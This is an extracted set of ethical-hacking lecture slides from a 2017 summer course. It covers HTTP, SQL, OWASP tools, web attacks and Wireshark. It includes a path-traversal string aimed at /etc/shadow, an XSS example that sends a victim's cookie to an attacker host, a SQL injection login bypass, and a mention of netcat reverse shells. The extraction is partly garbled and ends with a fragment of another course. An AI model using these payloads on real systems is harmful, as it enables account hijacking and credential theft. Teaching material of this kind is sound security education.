Introduction to Ethical Hacking

Size: px

Start display at page:

Download "Introduction to Ethical Hacking"

Dennis Stevens
6 years ago
Views:

1 Introduction to Ethical Hacking Summer University 2017 Seoul, Republic of Korea Alexandre Karlov

2 Today Some tools for web attacks Wireshark How a writeup looks like

3 0x04 Tools for Web attacks

4 Overview Reminders HTTP, requests / responses, GET / POST SQL OWASP A few useful tools Attacks URL manipulation Client-side protections «Session Hijacking» «Cross-site scripting» (XSS) «Cross-site request forgeries» (CSRF) SQL injections

5 HTTP: a few reminders HTTP: HyperText Transfer Protocol Designed to exchange ressources Communication protocol Client-Server architecture (requests - responses) Application layer, on the top of a reliable stack (TCP/IP) It is stateless software HTTP (TCP port 80) IP address server files and ressources

Client-server architecture Web browser (Client) Click Open connection I want [ ] (GET) [content] Connexion closed IP address HTTP listener (port TCP 80) Wait for a

6 Client-server architecture Web browser (Client) Click Open connection I want [ ] (GET) [content] Connexion closed IP address HTTP listener (port TCP 80) Wait for a connection. Clients: Browsers Application (mobile / desktop) Robots, spiders Scanner, fuzzers Servers: Apache Microsoft Internet Information Services (IIS) Tomcat Nginx Etc

7 HTTP request Client Server Most of the times GET or POST Request <METHOD> <RESSOURCE> <PROT_VERSION> <HEADERS> <empty line> <CONTENT (optionnal>

8 HTTP header fields General : Cache-Control: no-cache Date: Tue, 15 Nov :12:31 GMT Request : Accept: text/plain;q=0.5, text/html Accept-Charset: iso , unicode-1-1;q=0.8 From: user@heig-vd.ch Referer: User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 95) Response : Location: Server: Microsoft-IIS/6.0 Entity : Content-Encoding: gzip Content-Length: 3495 (en octets) Content-Type: text/html; charset=iso Last-Modified: Tue, 15 Nov :45:26 GMT

9 HTTP response Code Classe Example 1xx Informational 100 Continue 2xx Success 200 OK Client Request Server 3xx Redirection 301 Moved Permanently 302 Found, temp. other URI 304 Not Modified 4xx Client error 400 Bad Request 401 Unauthorized 403 Forbidden 404 Not Found 5xx Server error 500 Internal Server Error 503 Service Unavailable Response <PROT_VERSION> <STATUS-CODE> <STATUS-PHRASE> <HEADERS> A file : HTML, JPG, CSS, Dynamic page : PHP, JSP, Meta-data <DATA>

10 HTTP with many resources Client Server Request main HTML Transfer HTML Request image 1 Transfer image 1 Request image 2 Finish and display page Transfer image 2

11 HTTP stateless? HTTP is stateless A response depends only on the request (independent from others request/responses) Personalized URLs Cookie usage Use special header fields Set-Cookie header (in a response) : setup a cookie value. Cookie header (in a request) : cookie.

12 Databases / SQL Most of the time, the Web application uses a database to store data SQL (TCP port 3306) Adresse IP server server HTTP (TCP port 80) Adresse IP files and ressources (dynamic pages) server

13 Simple Query Language (SQL) Example of the table «users» id name password 1 Artur Art_pwd 2 Charlie kjasd Bob 912kkas9 4 Elvis 1234 Simple commands allow the Web application to interact with the database : INSERT INTO users (id, username, password) VALUES ( 4, Elvis, 1234 ); UPDATE users SET password = 4567 WHERE username = Elvis ; DELETE FROM users WHERE username = Elvis ; SELECT id, username FROM users WHERE username = Elvis and password= 1234

14 OWASP overview The Open Web Application Security Project (OWASP) International organization, Open Source Free participation and open to anyone Mission : promote application security Web, software, mobile, Ressources : Documentation (wiki, books,...), guides, mailing lists, codes, tools, local chapters & conferences, ~ peoples, 190 chapters, 140 projects, supporters

updates per day +300 mailing lists 180 blogs 19 hacking attempts 2,962 files uploaded Testing

15 OWASP : Projects / knowledge Top 10 WebGoat WebScarab Zed Attack Proxy (ZAP) ESAPI ASVS Development guide Code review guide Knowledge base : 9,421 articles 427 presentations 200 updates per day +300 mailing lists 180 blogs 19 hacking attempts 2,962 files uploaded Testing guide and many many others. source :

16 OWASP : Top Ten (2013) [source]

17 Useful tools Web browsers Some attacks require just a browser. Some attacks require additional tools Browser plugins (Tamper data, Firebug, etc.) External tools, analysis/interception of communications Example : Advanced interception proxys The «simples» proxies became powerful suites with many functionalities Example : Burp suite Automated tools Web scanner/fuzzer/spider

18 Interception Proxy Requêtes... Réponses... Tools Other functionalities : Interception proxy Spider Fuzzer Vuln scanner Manual requests Server Cookies/session/tokens analyzer Relay messages Alter messages should be configured to connect to the local proxy Client Exemples : Burp, ZAP Proxy, Nikto, TamperData,

19 Burp Suite The most well-known toolbox for web hacking Comprises: Proxy - intercept and modify requests Spider - discover content Scanner - vulnerabilities scanner Intruder/repeater - attack tools Free version available in Kali

20 Web attacks URL manipulation Client-side protections «Session Hijacking» «Cross-site scripting» (XSS) «Cross-site request forgeries» (CSRF) SQL injections (and many others)

21 URL manipulation / forgery Ressource discovery In an URL : "../.." "../../../../../etc/shadow" (password file) In a general way : URL forgery for directory URL forgery to access special files (e.g.: *.php~) Parameters tampering in the URL or in the cookie : identifier, role, ressource, etc.

22 Client side protections Client side protections can be bypassed! Cookie values «Referer» Javascript or any result of a script which gets executed on client-side Fields (even if choice selection, hidden, or protected by Javascript) and many others The Web application should do (or re-do) the controls serverside.

23 Session hijacking A session can be stolen : Log into a system without authentication HTTP : cookie stolen, URL stolen, URL forgery, etc. Client Server Client GET index.html Server GET pub.php&id= Get the session by stealing the id parameter index.html Set-cookie pub.php&id= Il suffit de voler le cookie Get the session by pour accéder stealing the cookie à la session! GET pub.html cookie pub.html

24 XSS - Cross site scripting Reflected XSS (non-persistent) The attacker injects data, and it is used as-is in the response or in a script. Exemple : search engine on websites. Stored XSS The data injected by an attacker are stored on the server. At each new access, the client will receive the stored script (XSS). Exemples : forums, gold books,... DOM-based XSS «Document Object Model» (DOM) modification Injection generally happens in the URL. BeEF tool - Browser Exploitation Framework

XSS - Example stealing webmail cookie Email contains: <img src="http://www.urlinexsitante.com/im.

Send an email 3. Alice access the URL: http://www.pirate.com/cookie.php?

25 XSS - Example stealing webmail cookie contains: <img src=" onerror="window.location=' 1. Send an 3. Alice access the URL: (The cookie used is the one from coldmail.com) 2. Webmail connection 5. Session hijacking 4. Collect the cookie

26 DOM-based XSS : example Source : Expected : Attack : The browser creates a DOM object for the page.

27 CSRF - «Cross-Site Request Forgeries» CSRF is an attack that forces a user to execute nondesired action(s) on the Web application. To force the user, he should execute a special crafted request (delete something, change profile, change address, etc.) The attacker will craft the «good» request. Note that the user should be already authenticated (and have interesting privileges) within the application targeted by the attacker

28 Injections SQL injections A Web application contains a form where the fields are used to build a SQL request. Without protection, it is possible to «play» with the SQL command. Example of an HTML authentification form with login et password : If the result of the SQL request return something, SELECT nom, pwd FROM user_db WHERE nom ='$login' AND pwd ='$password' then we continue... else authentication failed. If we try to connect with toto et ' OR '1'='1 SELECT nom, pwd FROM user_db WHERE nom='toto' AND pwd='' OR '1'='1' We get an SQL request that always return something (if toto exists). The user will be accepted even if the password is wrong! System command injection Same idea, but in a command that is executed by the system.

29 0x05 Wireshark

30 Wireshark The ultimate packet sniffer Understanding/reverse engineering of protocols Network debugging Traffic analysis

31 Wireshark Capture filters Display filters

32 Reconstructing streams Wireshark

33 Last but not least Netcat Hacker s Swiss Army Knife Read and write tcp ports Transferring files, remote administration, reverse shells, Tcpdump Command-line packet capture and analyser When GUI is not available Fast To capture for further analysis with Wireshark:

Lecture Overview. IN5290 Ethical Hacking. Lecture 4: Web hacking 1, Client side bypass, Tampering data, Brute-forcing

Lecture Overview. IN5290 Ethical Hacking. Lecture 4: Web hacking 1, Client side bypass, Tampering data, Brute-forcing Lecture Overview IN5290 Ethical Hacking Lecture 4: Web hacking 1, Client side bypass, Tampering data, Brute-forcing Summary - how web sites work HTTP protocol Client side server side actions Accessing